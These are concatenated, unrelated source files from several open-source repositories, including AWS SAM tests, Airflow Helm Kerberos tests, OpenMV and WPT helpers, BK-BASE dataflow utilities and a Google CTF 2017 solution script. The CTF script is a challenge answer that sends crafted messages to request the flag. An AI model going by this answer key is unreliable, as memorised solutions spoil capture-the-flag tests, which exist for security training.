The ID of the review group must be passed as ``object_id``, and will
store that review group in the list.
"""
pass
@webapi_check_local_site
@augment_method_from(BaseWatchedObjectResource)
def delete(self, *args, **kwargs):
"""Deletes a watched review request entry.
This is the same effect as unstarring a review request. It does
not actually delete the review request, just the entry in the list.
"""
pass
def serialize_object(self, obj, *args, **kwargs):
return {
'id': obj.display_id,
self.item_result_key: obj,
}
def get_watched_object(self, queryset, obj_id, local_site_name=None,
*args, **kwargs):
if local_site_name:
return queryset.get(local_id=obj_id)
else:
return queryset.get(pk=obj_id)
watched_review_request_resource = WatchedReviewRequestResource()
|
d8c42c9ae4aa274cbba2abecc2de279d291906f6
|
8af4e173ab3be9b9fc5cf1b61dbb5da80234d5c7
|
/tests/integration/build_invoke/python/test_python_3_9.py
|
fb0b80b277ae51fd2f55012e0c09dfb3560229c7
|
[
"Apache-2.0"
] |
permissive
|
aws/aws-sam-cli-app-templates
|
d464da1665d84eda9f427f682b985538827d41b6
|
88380eb265d58c496ea80685d4a5701e3cfc13d2
|
refs/heads/master
| 2023-09-04T13:03:00.204479
| 2023-08-23T20:43:24
| 2023-08-23T20:43:24
| 211,362,544
| 354
| 230
|
Apache-2.0
| 2023-09-14T15:39:09
| 2019-09-27T16:42:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,388
|
py
|
test_python_3_9.py
|
from unittest import skip
from tests.integration.build_invoke.build_invoke_base import BuildInvokeBase
"""
For each template, it will test the following sam commands:
1. sam init
2. sam build --use-container (if self.use_container is False, --use-container will be omitted)
3. (if there are event jsons), for each event json, check `sam local invoke` response is a valid json
"""
class BuildInvoke_python3_9_cookiecutter_aws_sam_hello_python(BuildInvokeBase.SimpleHelloWorldBuildInvokeBase):
directory = "python3.9/hello"
class BuildInvoke_python3_9_cookiecutter_aws_sam_eventBridge_python(
BuildInvokeBase.EventBridgeHelloWorldBuildInvokeBase
):
directory = "python3.9/event-bridge"
class BuildInvoke_python3_9_cookiecutter_aws_sam_quick_start_web_with_connectors(BuildInvokeBase.QuickStartWebBuildInvokeBase):
directory = "python3.9/web-conn"
class BuildInvoke_python3_9_cookiecutter_aws_sam_step_functions_with_connectors(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/step-func-conn"
@skip("eventbridge schema app requires credential to pull missing files, skip")
class BuildInvoke_python3_9_cookiecutter_aws_sam_eventbridge_schema_app_python(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/event-bridge-schema"
class BuildInvoke_python3_9_cookiecutter_aws_sam_step_functions_sample_app(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/step-func"
class BuildInvoke_python3_9_cookiecutter_aws_sam_efs_python(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/efs"
class BuildInvoke_python3_9_cookiecutter_aws_sam_hello_pt_python(BuildInvokeBase.SimpleHelloWorldBuildInvokeBase):
directory = "python3.9/hello-pt"
# if we want to check response json, we need to setup efs
class BuildInvoke_image_python3_9_cookiecutter_aws_sam_hello_python_lambda_image(
BuildInvokeBase.SimpleHelloWorldBuildInvokeBase
):
directory = "python3.9/hello-img"
class BuildInvoke_python3_9_pytorch(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-pytorch"
class BuildInvoke_python3_9_scikit(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-scikit"
class BuildInvoke_python3_9_tensorflow(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-tensorflow"
class BuildInvoke_python3_9_xgboost(BuildInvokeBase.BuildInvokeBase):
directory = "python3.9/apigw-xgboost"
|
516be4a8ec591bdf53874d19144fdbf95d86e2b0
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowFlowMonitorCacheFilterInterface/cli/equal/golden_output2_expected.py
|
c9bbbbd52502665eaea1a7dfb463182267271d9a
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
golden_output2_expected.py
|
expected_output = {
"processed_flow": 560,
"matched_flow": 569,
"aggregated_flow": 569,
"showing_flow": "top 2",
"ipv6_source_address": ["4100:1:7:33::1", "150:1:2:10::1"],
"ipv6_dest_address": ["21:28:1::2", "110:1:1:10::1"],
"interface_input_val": ["Gi1/0/13", "Gi1/0/13"],
"ip_version": ["6", "6"],
"ip_protocol": ["59", "59"],
"ip_tos": ["0x00", "0x00"],
"interface_output_val": ["Null", "Null"],
"counter_packets_long": ["4", "8"],
"timestamp_abs_first": ["18:11:28.000", "18:11:34.000"],
"timestamp_abs_last": ["18:11:35.000", "18:11:36.000"],
"counter_bytes_layers_long": ["2048", "3712"],
}
|
e8ad314381949fe480df8082600ae9338eeba5d0
|
50dd46b8ece33f3cdd174284b15d1d51f89669d4
|
/2017/quals/2017-re-ascii-art/src/solution/solution.py
|
5a3e345d37b1eac3110438d474df767354add6d1
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
google/google-ctf
|
f99da1ee07729bbccb869fff1cbaed6a80e43bcc
|
df02323eaf945d15e124801c74abaadca2749dc7
|
refs/heads/master
| 2023-08-31T14:30:27.548081
| 2023-08-29T13:04:20
| 2023-08-29T13:04:20
| 131,317,137
| 4,136
| 607
|
Apache-2.0
| 2023-08-30T22:17:02
| 2018-04-27T15:56:03
|
Go
|
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
solution.py
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import os
import requests
os.sys.path.insert(0, '../proto')
os.sys.path.insert(0, '../server')
import string_encoding
import aart_message_pb2
def send_encoded_message(msg):
serialized_msg = msg.SerializeToString()
encoded_message = string_encoding.encode_string(serialized_msg).encode("hex")
r = requests.post('http://' + server_address + '/', data = encoded_message)
print "Received content: ", string_encoding.decode_string(r.content.decode("hex"))
if __name__ == "__main__":
if len(os.sys.argv) != 2:
print "Missing server address"
exit()
server_address = os.sys.argv[1]
msg = aart_message_pb2.AArtMessage()
msg.type = aart_message_pb2.AArtMessage.R_HELLO
msg.client_id = 'A' * 32
msg.content = "HELLO"
send_encoded_message(msg)
msg.type = aart_message_pb2.AArtMessage.R_OPERATION
msg.content = "GET_FLAG"
send_encoded_message(msg)
|
7d79abf81aa838853983247bdbc8c8dd4fbd40eb
|
b8bbdfc593b6d816e67a344f720f90ec05236778
|
/helm_tests/security/test_kerberos.py
|
02c7d4e534c50f54604c349005ab9cd2c4b2eba0
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
apache/airflow
|
ed78db0a8bab7e096990e143926e52f518e288ab
|
1b122c15030e99cef9d4ff26d3781a7a9d6949bc
|
refs/heads/main
| 2023-09-01T08:37:34.556097
| 2023-09-01T06:49:05
| 2023-09-01T06:49:05
| 33,884,891
| 22,756
| 11,558
|
Apache-2.0
| 2023-09-14T20:12:36
| 2015-04-13T18:04:58
|
Python
|
UTF-8
|
Python
| false
| false
| 6,125
|
py
|
test_kerberos.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import json
import jmespath
from tests.charts.helm_template_generator import render_chart
class TestKerberos:
"""Tests kerberos."""
def test_kerberos_not_mentioned_in_render_if_disabled(self):
# the name is deliberately shorter as we look for "kerberos" in the rendered chart
k8s_objects = render_chart(name="no-krbros", values={"kerberos": {"enabled": False}})
# ignore airflow config map
k8s_objects_to_consider = [
obj for obj in k8s_objects if obj["metadata"]["name"] != "no-krbros-config"
]
k8s_objects_to_consider_str = json.dumps(k8s_objects_to_consider)
assert k8s_objects_to_consider_str.count("kerberos") == 1
def test_kerberos_envs_available_in_worker_with_persistence(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"workers": {
"kerberosSidecar": {"enabled": True},
"persistence": {
"enabled": True,
},
},
"kerberos": {
"enabled": True,
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert {"name": "KRB5_CONFIG", "value": "/etc/krb5.conf"} in jmespath.search(
"spec.template.spec.containers[0].env", docs[0]
)
assert {"name": "KRB5CCNAME", "value": "/var/kerberos-ccache/ccache"} in jmespath.search(
"spec.template.spec.containers[0].env", docs[0]
)
def test_kerberos_sidecar_resources(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"workers": {
"kerberosSidecar": {
"enabled": True,
"resources": {
"requests": {
"cpu": "200m",
"memory": "200Mi",
},
"limits": {
"cpu": "201m",
"memory": "201Mi",
},
},
},
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert jmespath.search("spec.template.spec.containers[2].resources.requests.cpu", docs[0]) == "200m"
assert (
jmespath.search("spec.template.spec.containers[2].resources.requests.memory", docs[0]) == "200Mi"
)
assert jmespath.search("spec.template.spec.containers[2].resources.limits.cpu", docs[0]) == "201m"
assert jmespath.search("spec.template.spec.containers[2].resources.limits.memory", docs[0]) == "201Mi"
def test_keberos_sidecar_resources_are_not_added_by_default(self):
docs = render_chart(
show_only=["templates/workers/worker-deployment.yaml"],
)
assert jmespath.search("spec.template.spec.containers[0].resources", docs[0]) == {}
def test_kerberos_keytab_exists_in_worker_when_enable(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"keytabBase64Content": "dGVzdGtleXRhYg==",
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/workers/worker-deployment.yaml"],
)
assert {
"name": "kerberos-keytab",
"subPath": "kerberos.keytab",
"mountPath": "/etc/airflow.keytab",
"readOnly": True,
} in jmespath.search("spec.template.spec.containers[0].volumeMounts", docs[0])
def test_kerberos_keytab_secret_available(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"keytabBase64Content": "dGVzdGtleXRhYg==",
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/secrets/kerberos-keytab-secret.yaml"],
)
assert jmespath.search('data."kerberos.keytab"', docs[0]) == "dGVzdGtleXRhYg=="
def test_kerberos_keytab_secret_unavailable_when_not_specified(self):
docs = render_chart(
values={
"executor": "CeleryExecutor",
"kerberos": {
"enabled": True,
"configPath": "/etc/krb5.conf",
"ccacheMountPath": "/var/kerberos-ccache",
"ccacheFileName": "ccache",
},
},
show_only=["templates/secrets/kerberos-keytab-secret.yaml"],
)
assert 0 == len(docs)
|
28d1e10eeaaf9fa96f8b4570c166d018529b2056
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/datamgr/metadata/metadata/util/datetime.py
|
5c4524a2b4a80335acb4fb147bdd138b0d3797b9
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
datetime.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Python 3.4 datetime.timestamp()实现
"""
import datetime
import time
ZERO = datetime.timedelta(0)
class _UTC(datetime.tzinfo):
"""UTC"""
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
_utc = _UTC()
_EPOCH = datetime.datetime(1970, 1, 1, tzinfo=_utc)
def timestamp(dt):
"""
Return POSIX timestamp as float.
>>> timestamp(datetime.datetime.now()) > 1494638812
True
"""
if dt.tzinfo is None:
return (
time.mktime((dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, -1, -1, -1)) + dt.microsecond / 1e6
)
else:
return (dt - _EPOCH).total_seconds()
|
b1d1f7d528dd84ae4f3b8a863f69cbc4c934b061
|
fbdc48c28e54fb33ae4842ef95ff63893902c99a
|
/scripts/unittest/script/11-find_lines.py
|
166f1e796c5f1aae2112d6ae67bc65d21e164247
|
[
"MIT"
] |
permissive
|
openmv/openmv
|
44d4b79fc8693950a2e330e5e0fd95b5c36e230f
|
8a90e070a88b7fc14c87a00351b9c4a213278419
|
refs/heads/master
| 2023-08-30T20:59:57.227603
| 2023-08-23T16:50:55
| 2023-08-23T16:50:55
| 14,360,940
| 2,150
| 1,226
|
MIT
| 2023-09-14T07:18:15
| 2013-11-13T10:23:44
|
C
|
UTF-8
|
Python
| false
| false
| 473
|
py
|
11-find_lines.py
|
def unittest(data_path, temp_path):
import image
img = image.Image("unittest/data/shapes.ppm", copy_to_fb=True)
lines = img.find_lines(threshold = 5000, theta_margin = 25, rho_margin = 25)
return len(lines) == 4 and\
lines[0][0:] == (22, 0, 22, 119, 119, 8670, 0, 22) and\
lines[1][0:] == (0, 39, 159, 39, 159, 8670, 90, 39) and\
lines[2][0:] == (57, 0, 57, 119, 119, 8670, 0, 57) and\
lines[3][0:] == (0, 75, 159, 75, 159, 10710, 90, 75)
|
a67a5e3a8be7b8502fb768621512b144c55027be
|
ebec36c2280a1aac0624019133bffe7152f09964
|
/benchmarks/pretraining_morphologizer_oscar/scripts/reset.py
|
def34298fdbd78fa646e60188efa3b4b97c1fc45
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
explosion/projects
|
8d783d5b150f03b6a68f345f1a50b3a692ff1745
|
e24a085669b4db6918ffeb2752846089d8dee57a
|
refs/heads/v3
| 2023-08-09T14:10:08.949067
| 2023-07-31T11:43:44
| 2023-07-31T11:43:44
| 223,165,649
| 1,171
| 492
|
MIT
| 2023-08-11T13:31:24
| 2019-11-21T12:08:52
|
Python
|
UTF-8
|
Python
| false
| false
| 543
|
py
|
reset.py
|
import shutil
from pathlib import Path
import typer
from wasabi import Printer
msg = Printer()
def main(path: Path):
"""This script is used to delete directories and reset the project"""
if path.is_dir():
answer = input(f"Are you sure you want to reset {path} (y)")
if answer.lower().strip() == "y":
try:
shutil.rmtree(path)
msg.good(f"Deleted directory {path}")
except Exception as e:
print(e)
if __name__ == "__main__":
typer.run(main)
|
2df870c83ed552096994d3bf8342716084490922
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/images/blue-png-cachable.py
|
6d8556542ab50d3e8c9dc163ddd2e41bec8f774e
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
blue-png-cachable.py
|
import os
from wptserve.utils import isomorphic_decode
def main(request, response):
"""Serves the contents in blue.png but with a Cache-Control header.
Emits a Cache-Control header with max-age set to 1h to allow the browser
cache the image. Used for testing behaviors involving caching logics.
"""
image_path = os.path.join(os.path.dirname(isomorphic_decode(__file__)), u"blue.png")
response.headers.set(b"Cache-Control", b"max-age=3600")
response.headers.set(b"Content-Type", b"image/png")
response.content = open(image_path, mode='rb').read()
|
403884b477d79363eddc08bfdcceeb0fff0086a7
|
55c5e55612f2d04294c02cec728729bdb1b323c8
|
/yeke/py-cflag/china_flag.py
|
e47448db41319bac58a122018fb0c30d326152ac
|
[] |
no_license
|
JustDoPython/python-examples
|
4efc9e3aafd533938b23012dbc72aeb175a87744
|
d4159751a86b1e9ce7867d0a7f1c12e8b8e0f213
|
refs/heads/master
| 2023-03-16T01:34:24.219119
| 2023-03-08T10:37:33
| 2023-03-08T10:37:33
| 249,331,676
| 423
| 423
| null | 2023-02-17T07:49:04
| 2020-03-23T04:00:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,020
|
py
|
china_flag.py
|
import turtle
turtle.setup(600,400,0,0)
turtle.bgcolor("red")
turtle.fillcolor("yellow")
turtle.color('yellow')
turtle.speed(10)
# 主星
turtle.begin_fill()
turtle.up()
turtle.goto(-280,100)
turtle.down()
for i in range (5):
turtle.forward(150)
turtle.right(144)
turtle.end_fill()
# 副星
turtle.begin_fill()
turtle.up()
turtle.goto(-100,180)
turtle.setheading(305)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.left(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-50,110)
turtle.setheading(30)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.right(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-40,50)
turtle.setheading(5)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.right(144)
turtle.end_fill()
turtle.begin_fill()
turtle.up()
turtle.goto(-100,10)
turtle.setheading(300)
turtle.down()
for i in range (5):
turtle.forward(50)
turtle.left(144)
turtle.end_fill()
turtle.hideturtle()
turtle.done()
|
9b6f5c18268e947c6acf01267a79e6c70ee9b19e
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/dataflow/flow/handlers/node_utils.py
|
b2daf4ba33a9cc76e7927c0de2bb81f03141ab9d
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661
| 2022-04-02T10:30:55
| 2022-04-02T10:30:55
| 381,257,882
| 101
| 51
|
NOASSERTION
| 2022-04-02T10:30:56
| 2021-06-29T06:10:01
|
Python
|
UTF-8
|
Python
| false
| false
| 29,642
|
py
|
node_utils.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from common.exceptions import ApiResultError
from django.utils.translation import ugettext as _
from dataflow.flow import exceptions as Errors
from dataflow.flow.handlers.node_factory import NODE_FACTORY
from dataflow.flow.models import FlowJob, FlowLinkInfo, FlowNodeInfo, FlowNodeRelation
from dataflow.flow.node_types import NodeTypes
from dataflow.pizza_settings import DEFAULT_HDFS_TAG
from dataflow.shared.auth.auth_helper import AuthHelper
from dataflow.shared.meta.tag.tag_helper import TagHelper
from dataflow.shared.resourcecenter.resourcecenter_helper import ResourceCenterHelper
from dataflow.shared.storekit.storekit_helper import StorekitHelper
from dataflow.udf.functions.function_driver import is_modify_with_udf_released
class NodeUtils(object):
def __init__(self):
pass
@staticmethod
def update_job_id(flow_id, node_id, job_id, job_type):
FlowJob.objects.update_or_create(
defaults={
"flow_id": flow_id,
"node_id": node_id,
"job_id": job_id,
"job_type": job_type,
"description": "创建任务",
},
node_id=node_id,
)
@staticmethod
def get_project_cluster_groups(project_id, resource_type, service_type=None, private_only=True):
"""
:return: 返回项目的私有集群列表
"""
cluster_groups = NodeUtils.get_cluster_groups_by_resource_type(project_id, resource_type, service_type)
if not cluster_groups:
raise Errors.FlowError(_("获取当前项目的集群组信息为空(project_id=%s)") % project_id)
private_cluster_groups = []
public_cluster_groups = []
other_cluster_groups = []
for one_cluster_group in cluster_groups:
if one_cluster_group["scope"] == "private":
private_cluster_groups.append(one_cluster_group)
elif one_cluster_group["scope"] == "public":
public_cluster_groups.append(one_cluster_group)
else:
other_cluster_groups.append(one_cluster_group)
if not public_cluster_groups:
raise Errors.FlowError(_("获取当前项目的公有集群组信息为空(project_id=%s)") % project_id)
if private_only:
return private_cluster_groups
else:
return private_cluster_groups + public_cluster_groups + other_cluster_groups
@staticmethod
def get_cluster_groups_by_resource_type(project_id, resource_type, service_type):
"""获取指定项目的特定 resource_type 下特定 service_type 的集群组列表
:param project_id:
:param resource_type: processing / storage
:param service_type: [stream, batch] / [hdfs]
:return:
"""
# get geog_area
geog_area_code = TagHelper.get_geog_area_code_by_project(project_id)
# get all cluster groups
cluster_groups = AuthHelper.list_project_cluster_group(project_id)
result_cluster_groups = []
# 遍历所有有权限的cluster_group
for one_cluster_group in cluster_groups:
# 获取 resource_group_id
resource_group_id_data = ResourceCenterHelper.get_res_group_id_by_cluster_group(
one_cluster_group["cluster_group_id"], geog_area_code
)
resource_group_id = None
if resource_group_id_data:
resource_group_id = resource_group_id_data[0]["resource_group_id"]
if not resource_group_id:
continue
# 获取 processing 的 cluster_group
clusters_data = ResourceCenterHelper.get_cluster_info(geog_area_code, resource_group_id, resource_type)
if clusters_data:
for one_cluster in clusters_data:
# 获取包含 stream / batch 类型的 cluster_group
if one_cluster["service_type"] in service_type:
result_cluster_groups.append(one_cluster_group)
break
return result_cluster_groups
@staticmethod
def get_storage_cluster_name(project_id, storage_type, result_table_id=None, tag=DEFAULT_HDFS_TAG):
"""
获取节点对应的存储类型所在的 cluster_name,
如果该rt存在对应存储类型的存储,则直接返回已存在的类型的存储所在的 cluster_name
:param project_id:
:param storage_type:
:param result_table_id: 如果 rt 非空,则返回 rt 对应的特定类型存储所在的集群的 cluster_name
:param tag: 默认为 DEFAULT_HDFS_TAG
:return:
"""
if result_table_id:
# 如果指定rt,则获取rt所在的存储集群信息
default_storage_config = None
try:
default_storage_config = StorekitHelper.get_physical_table(result_table_id, storage_type)
except BaseException:
# 当 rt 对应的特定类型的存储不存在时,忽略异常
pass
if default_storage_config:
return default_storage_config["cluster_name"]
_return_cluster_group = None
private_cluster_groups = NodeUtils.get_project_cluster_groups(
project_id, "storage", service_type=[storage_type]
)
for cluster_group in private_cluster_groups:
response_data = StorekitHelper.get_storage_cluster_configs(storage_type, cluster_group["cluster_group_id"])
# 对于 HDFS/TDW 存储,可选存储应该只有一个
if len(response_data) > 1:
raise Exception(
_("配置错误,项目%(project_id)s, 默认 %(storage_type)s 存储集群数量(%(storage_config_size)s)不唯一")
% {
"project_id": project_id,
"storage_type": storage_type,
"storage_config_size": len(response_data),
}
)
if response_data:
_return_cluster_group = response_data[0]["cluster_name"]
if not _return_cluster_group:
# 获取默认存储
geog_area_code = TagHelper.get_geog_area_code_by_project(project_id)
default_storage_cluster = StorekitHelper.get_default_storage(storage_type, geog_area_code, tag=tag)
if default_storage_cluster:
_return_cluster_group = default_storage_cluster["cluster_name"]
else:
raise Errors.FlowError(
_("获取当前项目的默认存储集群组信息为空(project_id=%s,geog_area_code=%s, storage_type=%s, tag=%s)")
% (project_id, geog_area_code, storage_type, tag)
)
return _return_cluster_group
@staticmethod
def get_related_nodes_by_rt(result_table_id, node_category=None):
"""
获取所有输出为 result_table_id 的节点
@param result_table_id:
@param node_category:
@return:
"""
if not node_category:
related_source_nodes = FlowNodeRelation.objects.filter(result_table_id=result_table_id)
else:
related_source_nodes = FlowNodeRelation.objects.filter(
node_type__in=node_category, result_table_id=result_table_id
)
return related_source_nodes
@staticmethod
def get_related_source_nodes(node_handler, related_category=NodeTypes.SOURCE_CATEGORY):
"""
获取当前 processing 节点所产生结果表被使用的数据源节点列表
@return:
"""
if node_handler.node_type not in NodeTypes.PROCESSING_CATEGORY:
return []
related_source_nodes = FlowNodeRelation.objects.filter(
node_type__in=related_category,
result_table_id__in=node_handler.result_table_ids,
)
return related_source_nodes
@staticmethod
def list_from_nodes_handler(from_node_ids):
"""
通过节点 ID 列表查询对象
"""
return [NODE_FACTORY.get_node_handler(_node_id) for _node_id in from_node_ids]
@staticmethod
def get_to_nodes_handler_by_id(node_id):
return [
NODE_FACTORY.get_node_handler(_id)
for _id in FlowLinkInfo.objects.filter(from_node_id=node_id).values_list("to_node_id", flat=True)
]
@staticmethod
def get_storage_upstream_node_handler(node_id):
"""
获得存储节点的上游节点,只有一个
"""
from_node_id = FlowLinkInfo.objects.filter(to_node_id=node_id)[0].from_node_id
return NODE_FACTORY.get_node_handler(from_node_id)
@staticmethod
def get_stream_to_nodes_handler_by_id(flow_id, node_id, node_types):
"""
返回flow_id, node_id对应的下游node_id
:param flow_id:
:param node_id:
:param node_types: 需过滤的节点类型集合
:return:
"""
ret = []
for _id in FlowLinkInfo.objects.filter(flow_id=flow_id, from_node_id=node_id).values_list(
"to_node_id", flat=True
):
one_node_handler = NODE_FACTORY.get_node_handler(_id)
if one_node_handler.node_type in node_types:
ret.append(_id)
return ret
@staticmethod
def gene_version():
"""
生成唯一版本号
"""
return FlowNodeInfo.gene_version()
@staticmethod
def validate_config(params, form_class, is_create):
"""
验证参数
@param {dict} params 参数
@param {object} form_class 校验参数的 Form 表单
"""
form = form_class(params, is_create)
if not form.is_valid():
err_msg = _("参数不对")
if hasattr(form, "format_errmsg"):
err_msg = form.format_errmsg()
raise Errors.NodeValidError(err_msg)
return form.cleaned_data
@staticmethod
def get_from_result_table_ids(node_type, node_config, specified_from_node_id=None):
"""
获取当前节点的源rt列表
@param node_type: 节点类型
@param node_config: 节点配置
@param specified_from_node_id: 获取指定上游节点的输入 RT
"""
from_result_table_ids = []
if node_type in NodeTypes.NEW_FROM_RESULT_TABLE_IDS_CATEGORY + NodeTypes.NEW_INPUTS_CATEGORY:
# 新节点配置
for from_result_table in NodeUtils.get_input_nodes_config(node_type, node_config):
if specified_from_node_id:
if str(from_result_table["id"]) == str(specified_from_node_id):
return from_result_table["from_result_table_ids"]
else:
from_result_table_ids.extend(from_result_table["from_result_table_ids"])
else:
if specified_from_node_id:
return NODE_FACTORY.get_node_handler(specified_from_node_id).result_table_ids
elif "from_result_table_ids" in node_config:
# 老节点配置
from_result_table_ids = node_config["from_result_table_ids"]
return from_result_table_ids
@staticmethod
def get_input_nodes_config(node_type, config):
"""
[
{
"id": 22771,
"from_result_table_ids": [
"591_test_1_clean"
]
},
{
"id": 22772,
"from_result_table_ids": [
"591_test_2_clean"
]
}
]
:param node_type:
:param config:
:return:
"""
if "inputs" in config:
return config["inputs"]
elif "from_nodes" in config:
return config["from_nodes"]
